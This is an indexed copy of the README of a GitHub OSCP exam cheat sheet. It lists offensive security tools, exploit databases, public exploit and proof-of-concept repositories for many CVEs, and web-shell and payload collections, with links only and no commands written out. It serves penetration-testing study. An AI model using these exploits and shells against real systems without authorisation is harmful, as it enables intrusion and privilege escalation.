Ecosyste.ms: Awesome

An open API service indexing awesome lists of open source software.
Awesome Lists | Featured Topics | Projects
https://github.com/0xsyr0/OSCP

OSCP Cheat Sheet
https://github.com/0xsyr0/OSCP
cheat-sheet cheatsheet offensive offensive-security offsec oscp oscp-guide penetration-testing pentesting security
Last synced: 3 months ago
JSON representation
OSCP Cheat Sheet
Host: GitHub
URL: https://github.com/0xsyr0/OSCP
Owner: 0xsyr0
Created: 2021-10-22T09:36:48.000Z (about 3 years ago)
Default Branch: main
Last Pushed: 2024-08-01T13:43:34.000Z (3 months ago)
Last Synced: 2024-08-01T15:18:33.575Z (3 months ago)
Topics: cheat-sheet, cheatsheet, offensive, offensive-security, offsec, oscp, oscp-guide, penetration-testing, pentesting, security
Language: PowerShell
Homepage:
Size: 5.53 MB
Stars: 2,595
Watchers: 61
Forks: 542
Open Issues: 0
Metadata Files:
- Readme: README.md
- Funding: .github/FUNDING.yml
- Code of conduct: CODE-OF-CONDUCT.md
Awesome Lists containing this project

awesome-starz - 0xsyr0/OSCP - OSCP Cheat Sheet (PowerShell)
README

        


  



# OSCP Cheat Sheet

![GitHub stars](https://img.shields.io/github/stars/0xsyr0/OSCP?logoColor=yellow) ![GitHub forks](https://img.shields.io/github/forks/0xsyr0/OSCP?logoColor=purple) ![GitHub watchers](https://img.shields.io/github/watchers/0xsyr0/OSCP?logoColor=green)

![GitHub commit activity (branch)](https://img.shields.io/github/commit-activity/m/0xsyr0/OSCP) ![GitHub contributors](https://img.shields.io/github/contributors/0xsyr0/OSCP)

Since this little project gets more and more attention, I decided to update it as often as possible to focus more helpful and absolutely necessary commands for the exam. At the moment the course seems not to cover `Active Directory Certificate Services (ADCS)` but I leave it the section about this topic in the cheat sheet. Maybe they add it to the course in the future.

Feel free to submit a pull request or reach out to me on [X](https://twitter.com/syr0_) for suggestions. Every contribution is appreciated!

> [!IMPORTANT]

> A guy on X got a point. Automatic exploitation tools like `sqlmap` are prohibited to use in the exam. The same goes for the automatic exploitation functionality of `LinPEAS`.

> I am not keeping track of current guidelines related to those tools. For that I want to point out that I am not responsible if anybody uses a tool without double checking the latest exam restrictions and fails the exam.

> Inform yourself before taking the exam!

Here are the link to the [OSCP Exam Guide](https://help.offsec.com/hc/en-us/articles/360040165632-OSCP-Exam-Guide#exam-restrictions) and the discussion about [LinPEAS](https://www.offensive-security.com/offsec/understanding-pentest-tools-scripts/?hss_channel=tw-134994790). I hope this helps.

Also here are two more important resources you should check out before you take the exam.

- [https://help.offsec.com/hc/en-us/articles/360040165632-OSCP-Exam-Guide](https://help.offsec.com/hc/en-us/articles/360040165632-OSCP-Exam-Guide)

- [https://help.offsec.com/hc/en-us/sections/360008126631-Proctored-Exams](https://help.offsec.com/hc/en-us/sections/360008126631-Proctored-Exams)

> [!NOTE]

> This repository will also try to cover as much as possible of the tools required for the proving grounds boxes.

Thank you for reading.




## Table of Contents

- [Basics](#basics)

- [Information Gathering](#information-gathering)

- [Vulnerability Analysis](#vulnerability-analysis)

- [Web Application Analysis](#web-application-analysis)

- [Database Assessment](#database-assessment)

- [Password Attacks](#password-attacks)

- [Exploitation Tools](#exploitation-tools)

- [Post Exploitation](#post-exploitation)

- [Exploit Databases](#exploit-databases)

- [CVEs](#cves)

- [Payloads](#payloads)

- [Wordlists](#wordlists)

- [Reporting](#reporting)

- [Social Media Resources](#social-media-resources)

- [Commands](#commands)

	- [Basics](#basics-1)

		- [curl](#curl)

		- [File Transfer](#file-transfer)

  		- [FTP](#ftp)

		- [Kerberos](#kerberos)

		- [Linux](#linux)

		- [Microsoft Windows](#microsoft-windows)

		- [PHP Webserver](#php-webserver)

		- [Ping](#ping)

		- [Port Forwarding](#port-forwarding-1)

		- [Python Webserver](#python-webserver)

		- [RDP](#rdp)

		- [showmount](#showmount)

  		- [SMB](#smb)

		- [smbclient](#smbclient)

		- [SSH](#ssh)

		- [Time and Date](#time-and-date)

		- [Tmux](#tmux)

		- [Upgrading Shells](#upgrading-shells)

		- [VirtualBox](#virtualbox)

		- [virtualenv](#virtualenv)

	- [Information Gathering](#information-gathering-1)

		- [memcached](#memcached)

		- [NetBIOS](#netbios)

		- [Nmap](#nmap)

		- [Port Scanning](#port-scanning)

		- [snmpwalk](#snmpwalk)

	- [Web Application Analysis](#web-application-analysis-1)

		- [Burp Suite](#burp-suite)

  		- [cadaver](#cadaver)

		- [Cross-Site Scripting (XSS)](#cross-site-scripting-xss)

		- [ffuf](#ffuf)

		- [Gobuster](#gobuster)

		- [GitTools](#gittools)

		- [Local File Inclusion (LFI)](#local-file-inclusion-lfi)

		- [PDF PHP Inclusion](#pdf-php-inclusion)

		- [PHP Upload Filter Bypasses](#php-upload-filter-bypasses)

		- [PHP Filter Chain Generator](#php-filter-chain-generator)

		- [PHP Generic Gadget Chains (PHPGGC)](#php-generic-gadget-chains-phpggc)

		- [Server-Side Request Forgery (SSRF)](#server-side-request-forgery-ssrf)

		- [Server-Side Template Injection (SSTI)](#server-side-template-injection-ssti)

		- [Upload Vulnerabilities](#upload-vulnerabilities)

		- [wfuzz](#wfuzz)

		- [WPScan](#wpscan)

		- [XML External Entity (XXE)](#xml-external-entity-xxe)

	- [Database Analysis](#database-analysis)

 		- [impacket-mssqlclient](#impacket-mssqlclient)

		- [MongoDB](#mongodb)

		- [MSSQL](#mssql)

		- [MySQL](#mysql)

		- [NoSQL Injection](#nosql-injection)

		- [PostgreSQL](#postgresql)

		- [Redis](#redis)

		- [SQL Injection](#sql-injection)

		- [SQL Truncation Attack](#sql-truncation-attack)

		- [sqlite3](#sqlite3)

		- [sqsh](#sqsh)

	- [Password Attacks](#password-attacks-1)

		- [DonPAPI](#donpapi)

		- [fcrack](#fcrack)

  		- [Group Policy Preferences (GPP)](#group-policy-preferences-gpp)

		- [hashcat](#hashcat)

		- [Hydra](#hydra)

		- [John](#john)

		- [Kerbrute](#kerbrute)

		- [LaZagne](#lazagne)

		- [mimikatz](#mimikatz)

  		- [NetExec](#netexec)

		- [pypykatz](#pypykatz)

		- [Spray-Passwords](#spray-passwords)

	- [Exploitation Tools](#exploitation-tools-1)

		- [Metasploit](#metasploit)

	- [Post Exploitation](#post-exploitation-1)

 		- [Account Operators Group Membership](#account-operators-group-membership)

 		- [Active Directory](#active-directory)

 		- [Active Directory Certificate Services (AD CS)](#active-directory-certificate-services-ad-cs)

		- [ADCSTemplate](#adcstemplate)

  		- [ADMiner](#adminer)

		- [BloodHound](#bloodhound)

		- [BloodHound Python](#bloodhound-python)

  		- [bloodyAD](#bloodyAD)

		- [Certify](#certify)

		- [Certipy](#certipy)

		- [enum4linux-ng](#enum4linux-ng)

		- [Evil-WinRM](#evil-winrm)

		- [Impacket](#impacket-1)

		- [JAWS](#jaws)

		- [Kerberos](#kerberos-1)

		- [ldapsearch](#ldapsearch)

		- [Linux](#linux-1)

		- [Microsoft Windows](#microsoft-windows-1)

		- [PassTheCert](#passthecert)

		- [PKINITtools](#pkinittools)

		- [Port Scanning](#port-scanning-1)

		- [powercat](#powercat)

		- [Powermad](#powermad)

		- [PowerShell](#powershell)

  		- [PrivescCheck](#privesccheck)

		- [pwncat](#pwncat)

		- [rpcclient](#rpcclient)

		- [Rubeus](#rubeus)

		- [RunasCs](#runascs)

		- [Seatbelt](#seatbelt)

		- [smbpasswd](#smbpasswd)

		- [winexe](#winexe)

	- [Social Engineering Tools](#social-engineering-tools)

		- [Microsoft Office Word Phishing Macro](#microsoft-office-word-phishing-macro)

		- [Microsoft Windows Library Files](#microsoft-windows-library-files)

	- [CVE](#cve)

		- [CVE-2014-6271: Shellshock RCE PoC](#cve-2014-6271-shellshock-rce-poc)

		- [CVE-2016-1531: exim LPE](#cve-2016-1531-exim-lpe)

		- [CVE-2019-14287: Sudo Bypass](#cve-2019-14287-sudo-bypass)

		- [CVE-2020-1472: ZeroLogon PE](#cve-2020-1472-zerologon-pe)

		- [CVE-2021–3156: Sudo / sudoedit LPE](#cve-2021-3156-sudo--sudoedit-lpe)

		- [CVE-2021-44228: Log4Shell RCE (0-day)](#cve-2021-44228-log4shell-rce-0-day)

		- [CVE-2022-0847: Dirty Pipe LPE](#cve-2022-0847-dirty-pipe-lpe)

		- [CVE-2022-22963: Spring4Shell RCE (0-day)](#cve-2022-22963-spring4shell-rce-0-day)

		- [CVE-2022-31214: Firejail LPE](#cve-2022-31214-firejail-lpe)

		- [CVE-2023-21746: Windows NTLM EoP LocalPotato LPE](#cve-2023-21746-windows-ntlm-eop-localpotato-lpe)

		- [CVE-2023-22809: Sudo Bypass](#cve-2023-22809-sudo-bypass)

		- [CVE-2023-32629, CVE-2023-2640: GameOverlay Ubuntu Kernel Exploit LPE (0-day)](#cve-2023-32629-cve-2023-2640-gameoverlay-ubuntu-kernel-exploit-lpe-0-day)

  		- [CVE-2023-4911: Looney Tunables LPE](#cve-2023-4911-looney-tunables-lpe)

   		- [CVE-2023-7028: GitLab Account Takeover](#cve-2023-7028-gitlab-account-takeover)

   		- [CVE-2024-4577: PHP-CGI Argument Injection Vulnerability RCE](#cve-2024-4577-php-cgi-argument-injection-vulnerability-rce)

  		- [GodPotato LPE](#godpotato-lpe)

		- [Juicy Potato LPE](#juicy-potato-lpe)

  		- [JuicyPotatoNG LPE](#juicypotatong-lpe)

		- [MySQL 4.x/5.0 User-Defined Function (UDF) Dynamic Library (2) LPE](#mysql-4x50-user-defined-function-udf-dynamic-library-2-lpe)

  		- [PrintSpoofer LPE](#printspoofer-lpe)

		- [SharpEfsPotato LPE](#sharpefspotato-lpe)

		- [Shocker Container Escape](#shocker-container-escape)

	- [Payloads](#payloads-1)

		- [Exiftool](#exiftool)

		- [Reverse Shells](#reverse-shells)

		- [Web Shells](#web-shells)

	- [Templates](#templates)

		- [ASPX Web Shell](#aspx-web-shell)

		- [Bad YAML](#bad-yaml)

	- [Wordlists](#wordlists-1)

		- [Bash](#bash)

		- [CeWL](#cewl)

		- [CUPP](#cupp)

		- [crunch](#crunch)

  		- [JavaScript Quick Wordlist](#javascript-quick-wordlist)

		- [Username Anarchy](#username-anarchy)

### Basics

| Name | URL |

| --- | --- |

| Chisel | https://github.com/jpillora/chisel |

| CyberChef | https://gchq.github.io/CyberChef |

| Ligolo-ng | https://github.com/nicocha30/ligolo-ng |

| Swaks | https://github.com/jetmore/swaks |

### Information Gathering

| Name | URL |

| --- | --- |

| Nmap | https://github.com/nmap/nmap |

### Vulnerability Analysis

| Name | URL |

| --- | --- |

| nikto | https://github.com/sullo/nikto |

| Sparta | https://github.com/SECFORCE/sparta |

### Web Application Analysis

| Name | URL |

| --- | --- |

| ffuf | https://github.com/ffuf/ffuf |

| fpmvuln | https://github.com/hannob/fpmvuln |

| Gobuster | https://github.com/OJ/gobuster |

| JSON Web Tokens | https://jwt.io |

| JWT_Tool | https://github.com/ticarpi/jwt_tool |

| Leaky Paths | https://github.com/ayoubfathi/leaky-paths |

| PayloadsAllTheThings | https://github.com/swisskyrepo/PayloadsAllTheThings |

| PHP Filter Chain Generator | https://github.com/synacktiv/php_filter_chain_generator |

| PHPGGC | https://github.com/ambionics/phpggc |

| Spose | https://github.com/aancw/spose |

| Wfuzz | https://github.com/xmendez/wfuzz |

| WhatWeb | https://github.com/urbanadventurer/WhatWeb |

| WPScan | https://github.com/wpscanteam/wpscan |

### Database Assessment

| Name | URL |

| --- | --- |

| RedisModules-ExecuteCommand | https://github.com/n0b0dyCN/RedisModules-ExecuteCommand |

| Redis RCE | https://github.com/Ridter/redis-rce |

| Redis Rogue Server | https://github.com/n0b0dyCN/redis-rogue-server |

| SQL Injection Cheatsheet | https://tib3rius.com/sqli.html |

### Password Attacks

| Name | URL |

| --- | --- |

| Default Credentials Cheat Sheet | https://github.com/ihebski/DefaultCreds-cheat-sheet |

| Firefox Decrypt | https://github.com/unode/firefox_decrypt |

| hashcat | https://hashcat.net/hashcat |

| Hydra | https://github.com/vanhauser-thc/thc-hydra |

| John | https://github.com/openwall/john |

| keepass-dump-masterkey | https://github.com/CMEPW/keepass-dump-masterkey |

| KeePwn | https://github.com/Orange-Cyberdefense/KeePwn |

| Kerbrute | https://github.com/ropnop/kerbrute |

| LaZagne | https://github.com/AlessandroZ/LaZagne |

| mimikatz | https://github.com/gentilkiwi/mimikatz |

| NetExec | https://github.com/Pennyw0rth/NetExec |

| ntlm.pw | https://ntlm.pw |

| pypykatz | https://github.com/skelsec/pypykatz |

### Exploitation Tools

| Name | URL |

| --- | --- |

| Evil-WinRM | https://github.com/Hackplayers/evil-winrm |

| Metasploit | https://github.com/rapid7/metasploit-framework |

### Post Exploitation

| Name | URL |

| --- | --- |

| ADCSKiller - An ADCS Exploitation Automation Tool | https://github.com/grimlockx/ADCSKiller |

| ADCSTemplate | https://github.com/GoateePFE/ADCSTemplate |

| ADMiner | https://github.com/Mazars-Tech/AD_Miner |

| adPEAS | https://github.com/ajm4n/adPEAS |

| BloodHound Docker | https://github.com/belane/docker-bloodhound |

| BloodHound | https://github.com/BloodHoundAD/BloodHound |

| BloodHound | https://github.com/ly4k/BloodHound |

| BloodHound Collectors | https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors |

| BloodHound Python | https://github.com/dirkjanm/BloodHound.py |

| bloodhound-quickwin | https://github.com/kaluche/bloodhound-quickwin |

| Certify | https://github.com/GhostPack/Certify |

| Certipy | https://github.com/ly4k/Certipy |

| Cheat Sheet - Attack Active Directory | https://github.com/drak3hft7/Cheat-Sheet---Active-Directory |

| DonPAPI | https://github.com/login-securite/DonPAPI |

| enum4linux-ng | https://github.com/cddmp/enum4linux-ng |

| Ghostpack-CompiledBinaries | https://github.com/r3motecontrol/Ghostpack-CompiledBinaries |

| GTFOBins | https://gtfobins.github.io |

| Impacket | https://github.com/fortra/impacket |

| Impacket Static Binaries | https://github.com/ropnop/impacket_static_binaries |

| JAWS | https://github.com/411Hall/JAWS |

| KrbRelay | https://github.com/cube0x0/KrbRelay |

| KrbRelayUp | https://github.com/Dec0ne/KrbRelayUp |

| Krbrelayx | https://github.com/dirkjanm/krbrelayx |

| LAPSDumper | https://github.com/n00py/LAPSDumper |

| LES | https://github.com/The-Z-Labs/linux-exploit-suggester |

| LinEnum | https://github.com/rebootuser/LinEnum |

| lsassy | https://github.com/Hackndo/lsassy |

| Moriaty | https://github.com/BC-SECURITY/Moriarty |

| nanodump | https://github.com/fortra/nanodump |

| PassTheCert | https://github.com/AlmondOffSec/PassTheCert |

| PEASS-ng | https://github.com/carlospolop/PEASS-ng |

| PKINITtools | https://github.com/dirkjanm/PKINITtools |

| powercat | https://github.com/besimorhino/powercat |

| PowerSharpPack | https://github.com/S3cur3Th1sSh1t/PowerSharpPack |

| PowerUp | https://github.com/PowerShellMafia/PowerSploit/blob/master/Privesc/PowerUp.ps1 |

| PowerView | https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1 |

| PowerView.py | https://github.com/aniqfakhrul/powerview.py |

| PPLdump | https://github.com/itm4n/PPLdump |

| Priv2Admin | https://github.com/gtworek/Priv2Admin |

| PrivescCheck | https://github.com/itm4n/PrivescCheck |

| PSPKIAudit | https://github.com/GhostPack/PSPKIAudit |

| pspy | https://github.com/DominicBreuker/pspy |

| pth-toolkit | https://github.com/byt3bl33d3r/pth-toolkit |

| pwncat | https://github.com/calebstewart/pwncat |

| PyWhisker | https://github.com/ShutdownRepo/pywhisker |

| Rubeus | https://github.com/GhostPack/Rubeus |

| RunasCs | https://github.com/antonioCoco/RunasCs |

| RustHound | https://github.com/OPENCYBER-FR/RustHound |

| scavenger | https://github.com/SpiderLabs/scavenger |

| SharpADWS | https://github.com/wh0amitz/SharpADWS |

| SharpCollection | https://github.com/Flangvik/SharpCollection |

| SharpChromium | https://github.com/djhohnstein/SharpChromium |

| SharpHound | https://github.com/BloodHoundAD/SharpHound |

| SharpView | https://github.com/tevora-threat/SharpView |

| Sherlock | https://github.com/rasta-mouse/Sherlock |

| WADComs | https://wadcoms.github.io |

| Watson | https://github.com/rasta-mouse/Watson |

| WESNG | https://github.com/bitsadmin/wesng

| Whisker | https://github.com/eladshamir/Whisker |

| Windows-privesc-check | https://github.com/pentestmonkey/windows-privesc-check |

| Windows Privilege Escalation Fundamentals | https://www.fuzzysecurity.com/tutorials/16.html |

| Windows Privilege Escalation | https://github.com/frizb/Windows-Privilege-Escalation |

### Exploit Databases

| Database | URL |

| --- | --- |

| 0day.today Exploit Database | https://0day.today |

| Exploit Database | https://www.exploit-db.com |

| Packet Storm | https://packetstormsecurity.com |

| Sploitus | https://sploitus.com |

### CVEs

| CVE | Descritpion | URL |

| --- | --- | --- |

| CVE-2014-6271 | Shocker RCE | https://github.com/nccgroup/shocker |

| CVE-2014-6271 | Shellshock RCE PoC | https://github.com/zalalov/CVE-2014-6271 |

| CVE-2014-6271 | Shellshocker RCE POCs | https://github.com/mubix/shellshocker-pocs |

| CVE-2016-5195 | Dirty COW LPE | https://github.com/firefart/dirtycow |

| CVE-2016-5195 | Dirty COW '/proc/self/mem' Race Condition (/etc/passwd Method) LPE | https://www.exploit-db.com/exploits/40847 |

| CVE-2016-5195 | Dirty COW 'PTRACE_POKEDATA' Race Condition (/etc/passwd Method) LPE | https://www.exploit-db.com/exploits/40839 |

| CVE-2017-0144 | EternalBlue (MS17-010) RCE | https://github.com/d4t4s3c/Win7Blue |

| CVE-2017-0199 | RTF Dynamite RCE | https://github.com/bhdresh/CVE-2017-0199 |

| CVE-2018-7600 | Drupalgeddon 2 RCE | https://github.com/g0rx/CVE-2018-7600-Drupal-RCE |

| CVE-2018-10933 | libSSH Authentication Bypass | https://github.com/blacknbunny/CVE-2018-10933 |

| CVE-2018-16509 | Ghostscript PIL RCE | https://github.com/farisv/PIL-RCE-Ghostscript-CVE-2018-16509 |

| CVE-2019-14287 | Sudo Bypass LPE | https://github.com/n0w4n/CVE-2019-14287 |

| CVE-2019-18634 | Sudo Buffer Overflow LPE | https://github.com/saleemrashid/sudo-cve-2019-18634 |

| CVE-2019-5736 | RunC Container Escape PoC | https://github.com/Frichetten/CVE-2019-5736-PoC |

| CVE-2019-6447 | ES File Explorer Open Port Arbitrary File Read | https://github.com/fs0c131y/ESFileExplorerOpenPortVuln |

| CVE-2019-7304 | dirty_sock LPE | https://github.com/initstring/dirty_sock |

| CVE-2020-0796 | SMBGhost RCE PoC | https://github.com/chompie1337/SMBGhost_RCE_PoC |

| CVE-2020-1472 | ZeroLogon PE Checker & Exploitation Code | https://github.com/VoidSec/CVE-2020-1472 |

| CVE-2020-1472 | ZeroLogon PE Exploitation Script | https://github.com/risksense/zerologon |

| CVE-2020-1472 | ZeroLogon PE PoC | https://github.com/dirkjanm/CVE-2020-1472 |

| CVE-2020-1472 | ZeroLogon PE Testing Script | https://github.com/SecuraBV/CVE-2020-1472 |

| CVE-2021-1675,CVE-2021-34527 | PrintNightmare LPE RCE | https://github.com/nemo-wq/PrintNightmare-CVE-2021-34527 |

| CVE-2021-1675 | PrintNightmare LPE RCE (PowerShell Implementation) | https://github.com/calebstewart/CVE-2021-1675 |

| CVE-2021-21972 | vCenter RCE | https://github.com/horizon3ai/CVE-2021-21972 |

| CVE-2021-22204 | ExifTool Command Injection RCE | https://github.com/AssassinUKG/CVE-2021-22204 |

| CVE-2021-22204 | GitLab ExifTool RCE | https://github.com/CsEnox/Gitlab-Exiftool-RCE |

| CVE-2021-22204 | GitLab ExifTool RCE (Python Implementation) | https://github.com/convisolabs/CVE-2021-22204-exiftool |

| CVE-2021-26085 | Confluence Server RCE | https://github.com/Phuong39/CVE-2021-26085 |

| CVE-2021-27928 | MariaDB/MySQL wsrep provider RCE | https://github.com/Al1ex/CVE-2021-27928 |

| CVE-2021-3129 | Laravel Framework RCE | https://github.com/nth347/CVE-2021-3129_exploit |

| CVE-2021-3156 | Sudo / sudoedit LPE  | https://github.com/mohinparamasivam/Sudo-1.8.31-Root-Exploit |

| CVE-2021-3156 | Sudo / sudoedit LPE PoC | https://github.com/blasty/CVE-2021-3156 |

| CVE-2021-3493 | OverlayFS Ubuntu Kernel Exploit LPE | https://github.com/briskets/CVE-2021-3493 |

| CVE-2021-3560 | polkit LPE (C Implementation) | https://github.com/hakivvi/CVE-2021-3560 |

| CVE-2021-3560 | polkit LPE | https://github.com/Almorabea/Polkit-exploit |

| CVE-2021-3560 | polkit LPE PoC | https://github.com/secnigma/CVE-2021-3560-Polkit-Privilege-Esclation |

| CVE-2021-36934 | HiveNightmare LPE | https://github.com/GossiTheDog/HiveNightmare |

| CVE-2021-36942 | PetitPotam | https://github.com/topotam/PetitPotam |

| CVE-2021-36942 | DFSCoerce | https://github.com/Wh04m1001/DFSCoerce |

| CVE-2021-4034 | PwnKit Pkexec Self-contained Exploit LPE | https://github.com/ly4k/PwnKit |

| CVE-2021-4034 | PwnKit Pkexec LPE PoC (1) | https://github.com/dzonerzy/poc-cve-2021-4034 |

| CVE-2021-4034 | PwnKit Pkexec LPE PoC (2) | https://github.com/arthepsy/CVE-2021-4034 |

| CVE-2021-4034 | PwnKit Pkexec LPE PoC (3) | https://github.com/nikaiw/CVE-2021-4034 |

| CVE-2021-41379 | InstallerFileTakeOver LPE (0-day) (Archive) | https://github.com/klinix5/InstallerFileTakeOver |

| CVE-2021-41379 | InstallerFileTakeOver LPE (0-day) (Fork) | https://github.com/waltlin/CVE-2021-41379-With-Public-Exploit-Lets-You-Become-An-Admin-InstallerFileTakeOver |

| CVE-2021-41773,CVE-2021-42013, CVE-2020-17519 | Simples Apache Path Traversal (0-day) | https://github.com/MrCl0wnLab/SimplesApachePathTraversal |

| CVE-2021-42278,CVE-2021-42287 | sam-the-admin, sAMAccountName Spoofing / Domain Admin Impersonation PE | https://github.com/WazeHell/sam-the-admin |

| CVE-2021-42278 | sam-the-admin, sAMAccountName Spoofing / Domain Admin Impersonation PE (Python Implementation) | https://github.com/ly4k/Pachine |

| CVE-2021-42287,CVE-2021-42278 | noPac LPE (1) | https://github.com/cube0x0/noPac |

| CVE-2021-42287,CVE-2021-42278 | noPac LPE (2) | https://github.com/Ridter/noPac |

| CVE-2021-42321 | Microsoft Exchange Server RCE | https://gist.github.com/testanull/0188c1ae847f37a70fe536123d14f398 |

| CVE-2021-44228 | Log4Shell RCE (0-day) | https://github.com/kozmer/log4j-shell-poc |

| CVE-2021-44228 | Log4Shell RCE (0-day) | https://github.com/welk1n/JNDI-Injection-Exploit |

| CVE-2022-0847 | DirtyPipe-Exploit LPE | https://github.com/n3rada/DirtyPipe |

| CVE-2022-0847 | DirtyPipe-Exploits LPE | https://github.com/AlexisAhmed/CVE-2022-0847-DirtyPipe-Exploits |

| CVE-2022-21999 | SpoolFool, Windows Print Spooler LPE | https://github.com/ly4k/SpoolFool |

| CVE-2022-22963 | Spring4Shell RCE (0-day) | https://github.com/tweedge/springcore-0day-en |

| CVE-2022-23119,CVE-2022-23120 | Trend Micro Deep Security Agent for Linux Arbitrary File Read | https://github.com/modzero/MZ-21-02-Trendmicro |

| CVE-2022-24715 | Icinga Web 2 Authenticated Remote Code Execution RCE | https://github.com/JacobEbben/CVE-2022-24715 |

| CVE-2022-26134 | ConfluentPwn RCE (0-day) | https://github.com/redhuntlabs/ConfluentPwn |

| CVE-2022-31214 | Firejail / Firejoin LPE | https://seclists.org/oss-sec/2022/q2/188 |

| CVE-2022-31214 | Firejail / Firejoin LPE | https://www.openwall.com/lists/oss-security/2022/06/08/10 |

| CVE-2022-34918 | Netfilter Kernel Exploit LPE | https://github.com/randorisec/CVE-2022-34918-LPE-PoC |

| CVE-2022-46169 | Cacti Authentication Bypass RCE | https://github.com/ariyaadinatha/cacti-cve-2022-46169-exploit |

| CVE-2023-20598 | PDFWKRNL Kernel Driver LPE | https://github.com/H4rk3nz0/CVE-2023-20598-PDFWKRNL |

| CVE-2023-21746 | Windows NTLM EoP LocalPotato LPE | https://github.com/decoder-it/LocalPotato |

| CVE-2023-21768 | Windows Ancillary Function Driver for WinSock LPE POC | https://github.com/chompie1337/Windows_LPE_AFD_CVE-2023-21768 |

| CVE-2023-21817 | Kerberos Unlock LPE PoC | https://gist.github.com/monoxgas/f615514fb51ebb55a7229f3cf79cf95b |

| CVE-2023-22809 | sudoedit LPE | https://github.com/n3m1dotsys/CVE-2023-22809-sudoedit-privesc |

| CVE-2023-23752 | Joomla Unauthenticated Information Disclosure | https://github.com/Acceis/exploit-CVE-2023-23752 |

| CVE-2023-25690 | Apache mod_proxy HTTP Request Smuggling PoC | https://github.com/dhmosfunk/CVE-2023-25690-POC |

| CVE-2023-28879 | Shell in the Ghost: Ghostscript RCE PoC | https://github.com/AlmondOffSec/PoCs/tree/master/Ghostscript_rce |

| CVE-2023-32233 | Use-After-Free in Netfilter nf_tables LPE | https://github.com/Liuk3r/CVE-2023-32233 |

| CVE-2023-32629, CVE-2023-2640 | GameOverlay Ubuntu Kernel Exploit LPE (0-day) | https://twitter.com/liadeliyahu/status/1684841527959273472?s=09 |

| CVE-2023-36874 | Windows Error Reporting Service LPE (0-day) | https://github.com/Wh04m1001/CVE-2023-36874 |

| CVE-2023-51467, CVE-2023-49070 | Apache OFBiz Authentication Bypass | https://github.com/jakabakos/Apache-OFBiz-Authentication-Bypass |

| CVE-2023-7028 | GitLab Account Takeover | https://github.com/V1lu0/CVE-2023-7028 |

| CVE-2023-7028 | GitLab Account Takeover | https://github.com/Vozec/CVE-2023-7028 |

| CVE-2024-0582 | Ubuntu Linux Kernel io_uring LPE | https://github.com/ysanatomic/io_uring_LPE-CVE-2024-0582 |

| CVE-2024-1086 | Use-After-Free Linux Kernel Netfilter nf_tables LPE | https://github.com/Notselwyn/CVE-2024-1086 |

| CVE-2024-4577 | PHP-CGI Argument Injection Vulnerability RCE | https://github.com/watchtowrlabs/CVE-2024-4577 |

| CVE-2024-30088 | Microsoft Windows LPE | https://github.com/tykawaii98/CVE-2024-30088 |

| n/a | dompdf RCE (0-day) | https://github.com/positive-security/dompdf-rce |

| n/a | dompdf XSS to RCE (0-day) | https://positive.security/blog/dompdf-rce |

| n/a | StorSvc LPE | https://github.com/blackarrowsec/redteam-research/tree/master/LPE%20via%20StorSvc |

| n/a | ADCSCoercePotato | https://github.com/decoder-it/ADCSCoercePotato |

| n/a | CoercedPotato LPE | https://github.com/Prepouce/CoercedPotato |

| n/a | DCOMPotato LPE | https://github.com/zcgonvh/DCOMPotato |

| n/a | DeadPotato LPE | https://github.com/lypd0/DeadPotato |

| n/a | GenericPotato LPE | https://github.com/micahvandeusen/GenericPotato |

| n/a | GodPotato LPE | https://github.com/BeichenDream/GodPotato |

| n/a | JuicyPotato LPE | https://github.com/ohpe/juicy-potato |

| n/a | Juice-PotatoNG LPE | https://github.com/antonioCoco/JuicyPotatoNG |

| n/a | MultiPotato LPE | https://github.com/S3cur3Th1sSh1t/MultiPotato |

| n/a | RemotePotato0 PE | https://github.com/antonioCoco/RemotePotato0 |

| n/a | RoguePotato LPE | https://github.com/antonioCoco/RoguePotato |

| n/a | RottenPotatoNG LPE | https://github.com/breenmachine/RottenPotatoNG |

| n/a | SharpEfsPotato LPE | https://github.com/bugch3ck/SharpEfsPotato |

| n/a | SigmaPotato LPE | https://github.com/tylerdotrar/SigmaPotato |

| n/a | SweetPotato LPE | https://github.com/CCob/SweetPotato |

| n/a | SweetPotato LPE | https://github.com/uknowsec/SweetPotato |

| n/a | S4UTomato LPE | https://github.com/wh0amitz/S4UTomato |

| n/a | PrintSpoofer LPE (1) | https://github.com/dievus/printspoofer |

| n/a | PrintSpoofer LPE (2) | https://github.com/itm4n/PrintSpoofer |

| n/a | Shocker Container Escape | https://github.com/gabrtv/shocker |

| n/a | SystemNightmare PE | https://github.com/GossiTheDog/SystemNightmare |

| n/a | NoFilter LPE | https://github.com/deepinstinct/NoFilter |

| n/a | OfflineSAM LPE | https://github.com/gtworek/PSBits/tree/master/OfflineSAM |

| n/a | OfflineAddAdmin2 LPE | https://github.com/gtworek/PSBits/tree/master/OfflineSAM/OfflineAddAdmin2 |

| n/a | Kernelhub | https://github.com/Ascotbe/Kernelhub |

| n/a | Windows Exploits | https://github.com/SecWiki/windows-kernel-exploits |

| n/a | Pre-compiled Windows Exploits | https://github.com/abatchy17/WindowsExploits |

### Payloads

| Name | URL |

| --- | --- |

| Payload Box | https://github.com/payloadbox |

| PayloadsAllTheThings | https://github.com/swisskyrepo/PayloadsAllTheThings |

| phpgcc | https://github.com/ambionics/phpggc |

| PHP-Reverse-Shell | https://github.com/ivan-sincek/php-reverse-shell|

| webshell | https://github.com/tennc/webshell |

| Web-Shells | https://github.com/TheBinitGhimire/Web-Shells |

### Wordlists

| Name | URL |

| --- | --- |

| bopscrk | https://github.com/R3nt0n/bopscrk |

| CeWL | https://github.com/digininja/cewl |

| COOK | https://github.com/giteshnxtlvl/cook |

| CUPP | https://github.com/Mebus/cupp |

| Kerberos Username Enumeration | https://github.com/attackdebris/kerberos_enum_userlists |

| SecLists | https://github.com/danielmiessler/SecLists |

| Username Anarchy | https://github.com/urbanadventurer/username-anarchy |

### Reporting

| Name | URL |

| --- | --- |

| OSCP-Note-Vault | https://github.com/0xsyr0/OSCP-Note-Vault |

| SysReptor | https://github.com/Syslifters/sysreptor |

| SysReptor OffSec Reporting | https://github.com/Syslifters/OffSec-Reporting |

| SysReptor Portal | https://oscp.sysreptor.com/oscp/signup/ |

### Social Media Resources

| Name | URL |

| --- | --- |

| OSCP Guide 01/12 – My Exam Experience | https://www.youtube.com/watch?v=9mrf-WyzkpE&list=PLJnLaWkc9xRgOyupMhNiVFfgvxseWDH5x |

| Rana Khalil | https://rana-khalil.gitbook.io/hack-the-box-oscp-preparation/ |

| HackTricks | https://book.hacktricks.xyz/ |

| HackTricks Local Windows Privilege Escalation Checklist | https://book.hacktricks.xyz/windows-hardening/checklist-windows-privilege-escalation |

